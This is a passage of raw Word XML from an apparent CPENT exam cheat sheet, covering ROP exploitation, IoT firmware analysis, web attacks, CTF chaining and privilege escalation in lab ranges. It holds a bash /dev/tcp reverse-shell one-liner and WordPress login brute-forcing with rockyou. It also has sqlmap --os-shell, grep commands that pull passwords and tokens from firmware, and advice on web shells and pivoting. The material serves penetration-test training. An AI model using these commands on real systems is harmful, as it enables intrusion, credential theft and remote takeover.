      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5DEC3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64-bit / NX on → ROP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> find gadgets (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ROPgadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binary .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ropper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">), build with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ret2libc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ret2syscall</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (same shape as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>eCPPT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">/LEE material). Linux reverse-shell one-liner if you land a shell: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/10.10.14.2/443 0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546FC1F8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="0942EAE4">
          <v:rect id="_x0000_i1204" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E712CD8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>17. IoT Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D24DEF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>Treat the device as a small networked computer + firmware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04A024" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># discover &amp; fingerprint (common IoT ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75806881" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p- &lt;device-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">&gt;                   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># 23 telnet, 1883 MQTT, 5683 CoAP, 502 Modbus, 554 RTSP, 1900 UPnP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A361E7D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># firmware analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C848A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># extract filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B587E2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>firmware.bin.extracted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -name "*.conf" -o -name "shadow" -o -name "passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2ADC91" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>rIn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 'password\|admin\|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>api_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">\|token' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>squashfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>-root/ 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C7CFE" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">strings </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> | grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 'passwd\|telnet\|http\|key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33FFB5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>emulate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a binary from the firmware (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE577A7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">-arm -L </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>squashfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>root .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>squashfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>-root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/bin/&lt;binary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C24A6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common wins:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> default/weak creds (telnet/HTTP admin), hardcoded secrets in firmware, unauthenticated web/command-injection in the device UI, exposed UART/JTAG debug. Then pivot from the device into the network like any other host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186CC1E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="6739D836">
          <v:rect id="_x0000_i1205" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B51969C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>18. Web Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B8DE0" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Web is usually the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>entry point</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> to an internal segment — exploit → shell → pivot (§4–10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4EB4D9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> http://&lt;web-ip&gt;; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -u http://&lt;web-ip&gt; -w directory-list-2.3-medium.txt -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>php,txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="187CC6F2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># WordPress (from the notes' WP host):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E8EACA" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> http://&lt;web-ip&gt; --enumerate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>u,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>t,vp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5383F5B0" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> http://&lt;web-ip&gt; -U admin -P rockyou.txt          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># brute wp-login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08754485" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -u "http://&lt;web-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>page?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>=1" --batch --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15D26528" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -u "http://&lt;web-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>page?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>=1" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">-shell               </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># if stacked/FILE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F63E8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web flaw → shell → pivot:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>SQLi→creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">; file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>upload→web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> shell; LFI/RFI→RCE; command injection; WordPress </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>admin→theme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">/plugin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>editor→PHP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> RCE. Once you have a shell on the web host, check its second NIC (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) — it's dual-homed into the AD range, so pivot inward (this is the intended CPENT path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092893DA" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="31286FFA">
          <v:rect id="_x0000_i1206" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCBA21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>19. CTF Range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D7D14" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Mixed challenges requiring you to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> everything: recon → exploit (web/binary/service) → loot → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pivot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → escalate → repeat across segments. What wins here is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time management</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> + a rock-solid tunneling setup (a reliable reverse-SOCKS and a clean, tested </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> config). Keep the reflex: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>see a dual-homed host → map its subnets → route through it → move on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF409C2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="775C93EC">
          <v:rect id="_x0000_i1207" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="192738BC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>20. Privilege Escalation (Windows &amp; Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8554C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>You'll land as a low-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> user on most footholds — escalate before looting/pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD05A7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE7E42" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">id; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -l; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -a; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">-release          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># who am I, </w:t>
